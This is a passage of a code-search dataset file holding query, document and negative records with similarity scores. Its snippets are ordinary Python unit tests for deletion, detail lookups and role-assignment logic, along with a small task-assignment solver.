"def test_delete(self):\n SampleTemplate.create(self.metadata, self.new_study)\n SampleTemplate.delete(2)\n obs = self.conn_handler.execute_fetchall(\n \"SELECT * FROM qiita.required_sample_info WHERE study_id=2\")\n exp = []\n self.assertEqual(obs, exp)\n obs = self.conn_handler.execute_fetchall(\n \"SELECT * FROM qiita.study_sample_columns WHERE study_id=2\")\n exp = []\n self.assertEqual(obs, exp)\n with self.assertRaises(QiitaDBExecutionError):\n self.conn_handler.execute_fetchall(\n \"SELECT * FROM qiita.sample_2\")",
"def test_delete_edge_case_with_write_concern_0_return_None(self):\n p1 = self.Person(name=\"User Z\", age=20).save()\n del_result = p1.delete(w=0)\n assert del_result is None",
"def test_deleting_a_segment(self):\n pass",
"def test_delete_note(self):\n pass",
"def test_delete_complex_tree_03(comp):\n comp.delete(15)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 11, 12, 13, 14)\n assert tuple(comp.breadth_first()) == (11, 8, 13, 6, 10, 12, 14, 4, 7, 9)",
"def test_delete_complex_tree_02(comp):\n comp.delete(4)\n assert tuple(comp.in_order()) == (6, 7, 8, 9, 10, 11, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 13, 6, 10, 12, 14, 7, 9, 15)"
] |
[
"0.7936488",
"0.783981",
"0.7695349",
"0.76563674",
"0.7418453",
"0.7413371",
"0.7213009",
"0.7137496",
"0.7116104",
"0.7084131",
"0.70804936",
"0.707765",
"0.70765734",
"0.7072393",
"0.69517624",
"0.69384027",
"0.6938276",
"0.6938002",
"0.6929521",
"0.6919627",
"0.69065815",
"0.6898886",
"0.68551046",
"0.6841108",
"0.68368375",
"0.68355817",
"0.68346643",
"0.68253475",
"0.68188405",
"0.68054867"
] |
0.8929304
|
0
|
Test case for get_details7
|
def test_get_details7(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_details(self):",
"def test_data_object_get_details(self):\n pass",
"def test_get_details(self):\n restaurant_id = 23917\n with self.app.app_context():\n details = ordrin.get_details(restaurant_id)\n\n self.assertEquals(details['name'], 'Test Merchant 20130315',\n 'Check restaurant name on test details.')\n self.assertEquals(details['id'], restaurant_id,\n 'Check restaurant id on test details.')\n self.assertTrue(details['delivers'], 'Check delivery flag on test entry.')\n self.assertTrue(details['allows_asap'],\n 'Check asap flag on test details.')\n self.assertAlmostEqual(details['location'][0], 42.825685,\n 'Check latitude on test details.')\n self.assertAlmostEqual(details['location'][1], -73.879458,\n 'Check longitude on test details.')\n self.assertEquals(details['partner'], 'delivery.com',\n 'Check delivery partner on test details.')\n self.assertEquals(details['address'], '123 FAKE ST',\n 'Check address on test details.')\n self.assertTrue(False)",
"def test_get_pay_in_details(self):\n pass",
"def test_get_item_details(self, mock_requests_get):\n details = resources.get_item_details(21787)\n\n item = details.item\n assert item.id == 21787\n assert item.name == \"Steadfast boots\"\n assert item.type == \"Miscellaneous\"\n assert item.current.price == 5900000\n assert item.today.price == -138200\n assert item.members is True",
"def test_display_details(self):\n self.new_details.save_details()\n twitter = Details('Dennis', 'Facebook', 'Kiplangat', 'kiplangat18')\n twitter.save_details()\n gmail = Details('Amos', 'Gmail', 'amos', 'kiplangat18')\n gmail.save_details()\n self.assertEqual(len(Details.display_details(twitter.user_name)), 2)",
"def get_details(self):\n raise Exception(\"bad details\")",
"def test_get_transaction_details_request(self):\n self.trans_details.get_transaction_details(\n trans_id = 123456,\n )",
"def test_get_info(self):\n pass",
"def test_detail_format(self) -> None:\n r = self.perform_request('detail', True)\n self.assert_json_schema(r.json(), self.get_details_schema())",
"def test_detail(self):\n response = self.client.get('/exercises/{}/'.format(self.exer1.id))\n expected = {\n 'id': self.exer1.id,\n 'name': self.exer1.name,\n 'description': self.exer1.description,\n 'muscle_group': self.exer1.muscle_group\n }\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, expected)",
"def test_detail(self):\n response = self.client.get('/routines/{}/'.format(self.rout1.id))\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['id'], self.rout1.id)",
"def test_get_details(self):\n\t\tactual_details = self.watcher.analyze(layers=[self.second_layer])\n\t\texpected_details = self.watcher.get_details()\n\t\t\n\t\tself.assertEqual(len(actual_details), len(expected_details), \"actual and expected details differ\")",
"def get_details(self):\n return self.details",
"def get_details(self):\n return self.details",
"def get_details(self):\n return self.details",
"def test_detail(self):\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)",
"def test_get_rule_details(self):\n pass",
"def test_get_record(self):\n pass",
"def test_get_recipe_information(self):\n pass",
"def test_details(self, mock_product, mock_nutrival):\n mock_product.return_value = MagicMock(\n side_effect=Products.objects.filter()\n )\n mock_product.return_value.first.return_value = Products(rating=\"a\")\n mock_nutrival.return_value = MagicMock(\n side_effect=Products.objects.filter()\n )\n mock_nutrival.return_value.first.return_value = NutritionalValues()\n response = self.client.get(\"/details/1/\")\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"search/base.html\")\n self.assertTemplateUsed(response, \"search/search_form.html\")\n self.assertTemplateUsed(response, \"search/details.html\")\n self.assertIsInstance(response.context[\"product\"], Products)\n self.assertIsInstance(response.context[\"nutrival\"], NutritionalValues)\n self.assertIn(\"nutriscore-a\", response.context[\"nutriscore\"])",
"def test_detail(self):\n # Test detail URL using ad_guid.\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n # Test URL using email also.\n url = '/api/users/{}/'.format(self.user1.email.lower())\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)",
"def test_website_companies_get_details(self):\n pass",
"def test_get1(self):\n pass",
"def test_detail(client, auth):\n response = client.get(\"/100/detail\")\n assert response.status_code == 404\n\n response = client.get(\"/1/detail\")\n assert response.status_code == 200\n assert b\"test title\" in response.data\n assert b\"by test on 2018-01-01\" in response.data\n assert b\"test\\nbody\" in response.data\n assert b'href=\"/1/update\"' not in response.data\n\n auth.login()\n response = client.get(\"/1/detail\")\n assert b'href=\"/1/update\"' in response.data",
"def test_retrive_recipe_detail(self):\n recipe = create_sample_recipe(user=self.sample_user)\n recipe.tag.add(create_sample_tag(user=self.sample_user))\n recipe.ingredient.add(create_sample_ingredient(user=self.sample_user))\n\n detail_URL = get_detail_URL(recipe.id)\n res = self.client.get(detail_URL)\n\n serializer = RecipeDetailSerializer(recipe)\n\n self.assertEqual(res.data, serializer.data)",
"def hit_details(hit_id, sandbox, recruiter):\n prolific_check(recruiter, sandbox)\n rec = by_name(recruiter, skip_config_validation=True)\n details = rec.hit_details(hit_id, sandbox)\n print(json.dumps(details, indent=4, default=str))",
"def test_details_id_ok(self):\n self.check_response('/attributes/1',\n ('Attribute ID#1 not found',))",
"def test_get_records(self):\n pass",
"def test_get_activity_occurrence_details(self):\n pass"
] |
[
"0.8004347",
"0.79477316",
"0.76338315",
"0.7213044",
"0.7199065",
"0.71456754",
"0.7099346",
"0.70801014",
"0.7073461",
"0.69762564",
"0.68881756",
"0.67643636",
"0.66935813",
"0.66855335",
"0.66855335",
"0.66855335",
"0.66723365",
"0.655939",
"0.6510815",
"0.6490076",
"0.64320815",
"0.6377312",
"0.6343314",
"0.63171315",
"0.6316394",
"0.63138294",
"0.6293315",
"0.6286553",
"0.62431365",
"0.62229824"
] |
0.8986665
|
0
|
Test case for get_group_class_subject_assignments
|
def test_get_group_class_subject_assignments(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_assignments(self) -> List :\n return self.assignments",
"def test_groups_get(self):\n pass",
"def test_groups_get(self):\n pass",
"def test_get_groups(self):\n pass",
"def test_get_groups(self):\n pass",
"def testAssignClassifications(self):\n classifications = [c.UID for c in self.directory.getClassifications()]\n self.person.setClassifications(classifications)\n for c in self.person.getClassifications():\n self.failUnless(c.id in ['faculty', 'staff', 'grad-students'])\n self.failUnlessEqual(c.Type(), 'Classification')",
"def test_list_role_assignment_using_sourced_groups(self):\n test_plan = {\n # The default domain with 3 users, 3 groups, 3 projects,\n # plus 3 roles.\n 'entities': {'domains': {'id': CONF.identity.default_domain_id,\n 'users': 3, 'groups': 3, 'projects': 3},\n 'roles': 3},\n # Users 0 & 1 are in the group 0, User 0 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n # Spread the assignments around - we want to be able to show that\n # if sourced by group, assignments from other sources are excluded\n 'assignments': [{'user': 0, 'role': 0, 'project': 0},\n {'group': 0, 'role': 1, 'project': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1},\n {'user': 2, 'role': 1, 'project': 1},\n {'group': 2, 'role': 2, 'project': 2}\n ],\n 'tests': [\n # List all effective assignments sourced from groups 0 and 1\n {'params': {'source_from_group_ids': [0, 1],\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'project': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n # Adding a role a filter should further restrict the entries\n {'params': {'source_from_group_ids': [0, 1], 'role': 2,\n 'effective': True},\n 'results': [{'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def execute_assignment_cases(self, test_plan, test_data):\n def check_results(expected, actual, param_arg_count):\n if param_arg_count == 0:\n # It was an unfiltered call, so default fixture assignments\n # might be polluting our answer - so we take into account\n # how many assignments there were before the test.\n self.assertEqual(\n len(expected) + test_data['initial_assignment_count'],\n len(actual))\n else:\n self.assertThat(actual, matchers.HasLength(len(expected)))\n\n for each_expected in expected:\n expected_assignment = {}\n for param in each_expected:\n if param == 'inherited_to_projects':\n expected_assignment[param] = each_expected[param]\n elif param == 'indirect':\n # We're expecting the result to contain an indirect\n # dict with the details how the role came to be placed\n # on this entity - so convert the key/value pairs of\n # that dict into real entity references.\n indirect_term = {}\n for indirect_param in each_expected[param]:\n key, value = self._convert_entity_shorthand(\n indirect_param, each_expected[param],\n test_data)\n indirect_term[key] = value\n expected_assignment[param] = indirect_term\n else:\n # Convert a simple shorthand entry into a full\n # entity reference\n key, value = self._convert_entity_shorthand(\n param, each_expected, test_data)\n expected_assignment[key] = value\n self.assertIn(expected_assignment, actual)\n\n def convert_group_ids_sourced_from_list(index_list, reference_data):\n value_list = []\n for group_index in index_list:\n value_list.append(\n reference_data['groups'][group_index]['id'])\n return value_list\n\n # Go through each test in the array, processing the input params, which\n # we build into an args dict, and then call list_role_assignments. Then\n # check the results against those specified in the test plan.\n for test in test_plan.get('tests', []):\n args = {}\n for param in test['params']:\n if param in ['effective', 'inherited', 'include_subtree']:\n # Just pass the value into the args\n args[param] = test['params'][param]\n elif param == 'source_from_group_ids':\n # Convert the list of indexes into a list of IDs\n args[param] = convert_group_ids_sourced_from_list(\n test['params']['source_from_group_ids'], test_data)\n else:\n # Turn 'entity : 0' into 'entity_id = ac6736ba873d'\n # where entity in user, group, project or domain\n key, value = self._convert_entity_shorthand(\n param, test['params'], test_data)\n args[key] = value\n results = self.assignment_api.list_role_assignments(**args)\n check_results(test['results'], results, len(args))",
"def test_list_role_assignment_using_sourced_groups_with_domains(self):\n test_plan = {\n # A domain with 3 users, 3 groups, 3 projects, a second domain,\n # plus 3 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 3, 'projects': 3},\n 1],\n 'roles': 3},\n # Users 0 & 1 are in the group 0, User 0 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n # Spread the assignments around - we want to be able to show that\n # if sourced by group, assignments from other sources are excluded\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1},\n {'user': 2, 'role': 1, 'project': 1},\n {'group': 2, 'role': 2, 'project': 2}\n ],\n 'tests': [\n # List all effective assignments sourced from groups 0 and 1\n {'params': {'source_from_group_ids': [0, 1],\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n # Adding a role a filter should further restrict the entries\n {'params': {'source_from_group_ids': [0, 1], 'role': 1,\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'domain': 1},\n ]},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def test_calculate_assign_group_rdclass(request):\n print(\"\\n--Starting:\", request.node.name)\n\n net = ModelRoadwayNetwork.read(\n link_file=STPAUL_LINK_FILE,\n node_file=STPAUL_NODE_FILE,\n shape_file=STPAUL_SHAPE_FILE,\n fast=True,\n )\n\n net.calculate_assign_group()\n net.calculate_roadway_class()\n assert \"assign_group\" in net.links_df.columns\n assert \"roadway_class\" in net.links_df.columns\n print(\"Assign Group Frequency\")\n print(net.links_df[net.links_df.drive_access == 1].assign_group.value_counts())\n print(\"Roadway Class Frequency\")\n print(net.links_df[net.links_df.drive_access == 1].roadway_class.value_counts())\n ## todo write an assert that actually tests something",
"def test_list_role_assignment_using_inherited_sourced_groups(self):\n test_plan = {\n # A domain with 3 users, 3 groups, 3 projects, a second domain,\n # plus 3 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 3, 'projects': 3},\n 1],\n 'roles': 3},\n # Users 0 & 1 are in the group 0, User 0 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n # Spread the assignments around - we want to be able to show that\n # if sourced by group, assignments from other sources are excluded\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'domain': 0,\n 'inherited_to_projects': True},\n {'group': 1, 'role': 2, 'project': 1},\n {'user': 2, 'role': 1, 'project': 1,\n 'inherited_to_projects': True},\n {'group': 2, 'role': 2, 'project': 2}\n ],\n 'tests': [\n # List all effective assignments sourced from groups 0 and 1.\n # We should see the inherited group assigned on the 3 projects\n # from domain 0, as well as the direct assignments.\n {'params': {'source_from_group_ids': [0, 1],\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'project': 0,\n 'indirect': {'domain': 0}},\n {'group': 1, 'role': 2, 'project': 1,\n 'indirect': {'domain': 0}},\n {'group': 1, 'role': 2, 'project': 2,\n 'indirect': {'domain': 0}},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def test_delete_user_assignments_user_same_id_as_group(self):\n # Create a common ID\n common_id = uuid.uuid4().hex\n # Create a project\n project = unit.new_project_ref(\n domain_id=CONF.identity.default_domain_id)\n project = self.resource_api.create_project(project['id'], project)\n # Create a user\n user = unit.new_user_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n user = self.identity_api.driver.create_user(common_id, user)\n self.assertEqual(common_id, user['id'])\n # Create a group\n group = unit.new_group_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n group = self.identity_api.driver.create_group(common_id, group)\n self.assertEqual(common_id, group['id'])\n # Create four roles\n roles = []\n for _ in range(4):\n role = unit.new_role_ref()\n roles.append(self.role_api.create_role(role['id'], role))\n # Assign roles for user\n self.assignment_api.driver.create_grant(\n user_id=user['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[0]['id'])\n self.assignment_api.driver.create_grant(user_id=user['id'],\n project_id=project['id'],\n role_id=roles[1]['id'])\n # Assign roles for group\n self.assignment_api.driver.create_grant(\n group_id=group['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[2]['id'])\n self.assignment_api.driver.create_grant(group_id=group['id'],\n project_id=project['id'],\n role_id=roles[3]['id'])\n # Make sure they were assigned\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(2))\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(2))\n # Delete user assignments\n self.assignment_api.delete_user_assignments(user_id=user['id'])\n # Assert only user assignments were deleted\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(0))\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(2))\n # Make sure these remaining assignments are group-related\n for assignment in group_assignments:\n self.assertThat(assignment.keys(), matchers.Contains('group_id'))",
"def construct_assignments(priest_list, group_list):\n priest_list = copy(priest_list)\n group_list = copy(group_list)\n buff_assignments = []\n if len(priest_list) == len(group_list):\n \"\"\" 1 priest per group \"\"\"\n priest_group = zip(priest_list, group_list)\n for priest_assign in priest_group:\n priest, group = priest_assign\n buff_assignments.append({\"priest\": priest, \"groups_assigned\": [group]})\n elif len(priest_list) < len(group_list):\n \"\"\" Fewer priests than groups, some will have more than 1 group assigned. \n Function will attempt to give consecutive group assignments in these cases. \"\"\"\n priest_parties_each, priest_additionals = divmod(len(group_list), len(priest_list))\n for priest in priest_list:\n buff_allocation = {\"priest\": priest, \"groups_assigned\": []}\n if priest_additionals > 0:\n for x in range(priest_parties_each+1):\n group_pop = group_list.pop(0)\n buff_allocation[\"groups_assigned\"].append(group_pop)\n priest_additionals -= 1\n else:\n for x in range(priest_parties_each):\n group_pop = group_list.pop(0)\n buff_allocation[\"groups_assigned\"].append(group_pop)\n buff_assignments.append(buff_allocation)\n print(\"Outcome: \", buff_assignments)\n return buff_assignments",
"def test_grouping(self):\n s = self.create(ComponentItem, UML.Component)\n uc1 = self.create(UseCaseItem, UML.UseCase)\n uc2 = self.create(UseCaseItem, UML.UseCase)\n\n self.group(s, uc1)\n assert 1 == len(uc1.subject.subject)\n self.group(s, uc2)\n assert 1 == len(uc2.subject.subject)\n\n # Classifier.useCase is not navigable to UseCase\n # self.assertEqual(2, len(s.subject.useCase))",
"def get_class_assign(class_id):\n assignment_data = query_db(\n \"SELECT id, name, due_date FROM assignments \"\n \"WHERE topic_id=(SELECT id FROM topics WHERE class_id=?);\",\n [class_id],\n )\n assignments = []\n for assignment in assignment_data:\n assignment_dict_class = {}\n assignment_dict_class[\"id\"] = assignment[0]\n assignment_dict_class[\"name\"] = str(assignment[1])\n assignment_dict_class[\"due_date\"] = assignment[2]\n assignments.append(assignment_dict_class)\n return assignments",
"def test_get_group_class_types(self):\n pass",
"def test_delete_group_assignments_group_same_id_as_user(self):\n # Create a common ID\n common_id = uuid.uuid4().hex\n # Create a project\n project = unit.new_project_ref(\n domain_id=CONF.identity.default_domain_id)\n project = self.resource_api.create_project(project['id'], project)\n # Create a user\n user = unit.new_user_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n user = self.identity_api.driver.create_user(common_id, user)\n self.assertEqual(common_id, user['id'])\n # Create a group\n group = unit.new_group_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n group = self.identity_api.driver.create_group(common_id, group)\n self.assertEqual(common_id, group['id'])\n # Create four roles\n roles = []\n for _ in range(4):\n role = unit.new_role_ref()\n roles.append(self.role_api.create_role(role['id'], role))\n # Assign roles for user\n self.assignment_api.driver.create_grant(\n user_id=user['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[0]['id'])\n self.assignment_api.driver.create_grant(user_id=user['id'],\n project_id=project['id'],\n role_id=roles[1]['id'])\n # Assign roles for group\n self.assignment_api.driver.create_grant(\n group_id=group['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[2]['id'])\n self.assignment_api.driver.create_grant(group_id=group['id'],\n project_id=project['id'],\n role_id=roles[3]['id'])\n # Make sure they were assigned\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(2))\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(2))\n # Delete group assignments\n self.assignment_api.delete_group_assignments(group_id=group['id'])\n # Assert only group assignments were deleted\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(0))\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(2))\n # Make sure these remaining assignments are user-related\n for assignment in group_assignments:\n self.assertThat(assignment.keys(), matchers.Contains('user_id'))",
"def test_get_roles_for_groups_on_project(self):\n domain1 = unit.new_domain_ref()\n self.resource_api.create_domain(domain1['id'], domain1)\n domain2 = unit.new_domain_ref()\n self.resource_api.create_domain(domain2['id'], domain2)\n project1 = unit.new_project_ref(domain_id=domain1['id'])\n self.resource_api.create_project(project1['id'], project1)\n project2 = unit.new_project_ref(domain_id=domain2['id'])\n self.resource_api.create_project(project2['id'], project2)\n group_list = []\n group_id_list = []\n role_list = []\n for _ in range(6):\n group = unit.new_group_ref(domain_id=domain1['id'])\n group = self.identity_api.create_group(group)\n group_list.append(group)\n group_id_list.append(group['id'])\n\n role = unit.new_role_ref()\n self.role_api.create_role(role['id'], role)\n role_list.append(role)\n\n # Assign the roles - one inherited and one non-inherited on Domain1,\n # plus one on Project1\n self.assignment_api.create_grant(group_id=group_list[0]['id'],\n domain_id=domain1['id'],\n role_id=role_list[0]['id'])\n self.assignment_api.create_grant(group_id=group_list[1]['id'],\n domain_id=domain1['id'],\n role_id=role_list[1]['id'],\n inherited_to_projects=True)\n self.assignment_api.create_grant(group_id=group_list[2]['id'],\n project_id=project1['id'],\n role_id=role_list[2]['id'])\n\n # ...and a duplicate set of spoiler assignments to Domain2/Project2\n self.assignment_api.create_grant(group_id=group_list[3]['id'],\n domain_id=domain2['id'],\n role_id=role_list[3]['id'])\n self.assignment_api.create_grant(group_id=group_list[4]['id'],\n domain_id=domain2['id'],\n role_id=role_list[4]['id'],\n inherited_to_projects=True)\n self.assignment_api.create_grant(group_id=group_list[5]['id'],\n project_id=project2['id'],\n role_id=role_list[5]['id'])\n\n # With inheritance on, we should also get back the inherited role from\n # its owning domain.\n\n role_refs = self.assignment_api.get_roles_for_groups(\n group_id_list, project_id=project1['id'])\n\n self.assertThat(role_refs, matchers.HasLength(2))\n self.assertIn(role_list[1], role_refs)\n self.assertIn(role_list[2], role_refs)",
"def test_list_role_assignment_by_domain(self):\n test_plan = {\n # A domain with 3 users, 1 group, a spoiler domain and 2 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 1}, 1],\n 'roles': 2},\n # Users 1 & 2 are in the group\n 'group_memberships': [{'group': 0, 'users': [1, 2]}],\n # Assign a role for user 0 and the group\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 0}],\n 'tests': [\n # List all effective assignments for domain[0].\n # Should get one direct user role and user roles for each of\n # the users in the group.\n {'params': {'domain': 0, 'effective': True},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 1, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}},\n {'user': 2, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}}\n ]},\n # Using domain[1] should return nothing\n {'params': {'domain': 1, 'effective': True},\n 'results': []},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def test_get_user_assignable_assessments(self):\n api_instance = relias_api_client.AssessmentsApi(relias_api_client.ApiClient())\n result = api_instance.get_user_assignable_assessments(\"[email protected]\")\n self.assertEqual(result.total_count, 255)",
"def test_get_group(self):\n pass",
"def test_set_subject_return(self) -> None:\n\n given = \"example.org\"\n\n actual = self.checker.set_subject(given)\n\n self.assertIsInstance(actual, CheckerBase)",
"def test_groups_group_users_get(self):\n pass",
"def test_groups_group_users_get(self):\n pass",
"def test_list_role_assignments_unfiltered(self):\n test_plan = {\n # Create a domain, with a user, group & project\n 'entities': {'domains': {'users': 1, 'groups': 1, 'projects': 1},\n 'roles': 3},\n # Create a grant of each type (user/group on project/domain)\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'project': 0},\n {'group': 0, 'role': 2, 'domain': 0},\n {'group': 0, 'role': 2, 'project': 0}],\n 'tests': [\n # Check that we get back the 4 assignments\n {'params': {},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'project': 0},\n {'group': 0, 'role': 2, 'domain': 0},\n {'group': 0, 'role': 2, 'project': 0}]}\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def solveTaskGroupingAssignment(agent_capacity, task_cost, groups, assign_same_quantity_of_tasks=False):\n print(\"Agent capacities\", agent_capacity.values())\n agents = agent_capacity.keys()\n tasks = task_cost.keys()\n _groups = groups.keys()\n agentsxtasks = list(itertools.product(agent_capacity.keys(),\n task_cost.keys())) # Lista de pares resultante de hacer producto cartesiano entre agents y tasks\n tasks_en_groups = list(itertools.chain.from_iterable(groups.values()))\n agentsxtasks_in_groups = list(itertools.product(agent_capacity.keys(),\n tasks_en_groups)) # Lista de pares resultante de hacer producto cartesiano entre agents y tasks\n agentsxgroups = list(itertools.product(agent_capacity.keys(),\n groups.keys())) # Lista de pares resultante de hacer producto cartesiano entre agents y tasks\n prob = pulp.LpProblem(\"Task grouping assignment \", pulp.LpMinimize)\n assignment_vars = pulp.LpVariable.dicts(\"Assignment\", agentsxtasks, None, None, pulp.LpBinary)\n # Variables Auxes para ayudarse a resolver la desviacin estandard\n aux_vars = pulp.LpVariable.dicts(\"Aux\", agentsxtasks_in_groups, None, None)\n # Funcion objetivo\n\n assignment_agente_in_each_group = {} # (idagente, idgrupo): lpSum(tasks_del_grupo_idgrupo_al_agente_idagente\n\n # tasks asignadas al agente por grupo\n for agente in agents:\n for grupo in _groups:\n assignment_agente_in_each_group[(agente, grupo)] = pulp.lpSum(\n [assignment_vars[x] for x in agentsxtasks if x[0] == agente and x[1] in groups[grupo]])\n\n # Retorna la desviacion standard de las Assignmentes a un grupo determinado\n\n # print (assignment_agente_in_each_group[(1,0)])\n assignment_agent_in_each_group_average = {}\n for agente in agents:\n for grupo in _groups:\n assignment_agent_in_each_group_average[(agente, grupo)] = pulp.lpSum(\n assignment_agente_in_each_group[(agente, grupo)]) / float(len(groups[grupo]))\n assigned_tasks_to_agent_less_group_average = {}\n for agente in agents:\n for grupo in _groups:\n for task in groups[grupo]:\n assigned_tasks_to_agent_less_group_average[(agente, task)] = assignment_vars[(agente, task)] - \\\n assignment_agent_in_each_group_average[\n (agente, grupo)]\n\n def construir_desviacion_standard(agente, grupo):\n return pulp.lpSum([aux_vars[(agente, task)] for task in groups[grupo]]) / float((len(groups[grupo])))\n\n def construir_funcion_objetivo():\n return pulp.lpSum(\n [construir_desviacion_standard(agentexgrupo[0], agentexgrupo[1]) for agentexgrupo in agentsxgroups])\n\n # Restricciones\n assignments_by_agent = {}\n\n for agente in agents:\n assignments_by_agent[agente] = [task_cost[i[1]] * assignment_vars[i] for i in agentsxtasks if i[0] == agente]\n\n # La suma de las horas asignadas no puede superar el mximo de horas disponibles\n for agente in agents:\n prob += lpSum(assignments_by_agent[agente]) <= agent_capacity[agente]\n prob += construir_funcion_objetivo(), \"Minimizar desviacion estandard en la asignaciin de groups\"\n # Correspondencia valores absulutos y sus respectivas variables auxiliares\n for agente in agents:\n for task in tasks_en_groups:\n prob += assigned_tasks_to_agent_less_group_average[(agente, task)] <= aux_vars[(agente, task)]\n prob += -assigned_tasks_to_agent_less_group_average[(agente, task)] <= aux_vars[(agente, task)]\n\n # Una task solamente puede ser asignada a una persona:\n\n for task in tasks:\n prob += pulp.lpSum([assignment_vars[i] for i in agentsxtasks if i[1] == task]) == 1\n\n tiempo_solve_inicial = time()\n prob.solve()\n tiempo_final_solve = time()\n tiempo_solve 
= tiempo_final_solve - tiempo_solve_inicial\n\n # The status of the solution is printed to the screen\n print(\"Status:\", pulp.LpStatus[prob.status])\n\n for v in prob.variables():\n print(re.findall(r'\\d+', v.name))\n print(v.name, \"=\", v.varValue)\n print('El tiempo total de el solve fue:', tiempo_solve) # En segundos\n return prob.status, prob.variables()",
"def test_list_role_assignment_by_user_with_domain_group_roles(self):\n test_plan = {\n # A domain with 3 users, 3 groups, a spoiler domain\n # plus 3 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 3}, 1],\n 'roles': 3},\n # Users 1 & 2 are in the group 0, User 1 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 0},\n {'group': 1, 'role': 2, 'domain': 0},\n # ...and two spoiler assignments\n {'user': 1, 'role': 1, 'domain': 0},\n {'group': 2, 'role': 2, 'domain': 0}],\n 'tests': [\n # List all effective assignments for user[0].\n # Should get one direct user role and a user roles for each of\n # groups 0 and 1\n {'params': {'user': 0, 'effective': True},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}},\n {'user': 0, 'role': 2, 'domain': 0,\n 'indirect': {'group': 1}}\n ]},\n # Adding domain[0] as a filter should return the same data\n {'params': {'user': 0, 'domain': 0, 'effective': True},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}},\n {'user': 0, 'role': 2, 'domain': 0,\n 'indirect': {'group': 1}}\n ]},\n # Using domain[1] should return nothing\n {'params': {'user': 0, 'domain': 1, 'effective': True},\n 'results': []},\n # Using user[2] 